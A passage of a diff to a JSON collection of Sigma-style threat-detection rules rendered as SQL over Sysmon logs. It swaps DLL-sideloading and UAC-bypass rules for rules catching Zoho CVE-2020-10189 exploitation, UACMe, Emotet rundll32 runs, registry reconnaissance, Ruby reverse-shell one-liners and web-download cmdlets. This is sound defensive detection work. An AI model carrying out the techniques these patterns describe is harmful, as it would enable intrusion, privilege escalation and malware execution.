on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", 
"attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.t1548.002" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', 
'5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", - "author": "frack113", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": 
"Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, 
but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "test", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1059.001", - "attack.execution" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "title": "Fsutil Drive Enumeration", + "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Unknown" + "Certain software or administrative tasks may trigger false positives." 
], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_fsutil_drive_enumeration.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine 
LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Amsi.DLL Load By Uncommon Process", - "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", - "status": "experimental", - "description": "Detects loading of Amsi.dll by uncommon processes", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ - "Likely" + "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\ngentask.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_amsi_uncommon_process.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "WMI Modules Loaded", - "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "status": "test", - "description": "Detects non wmiprvse loading WMI modules", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR Image LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR Image LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' 
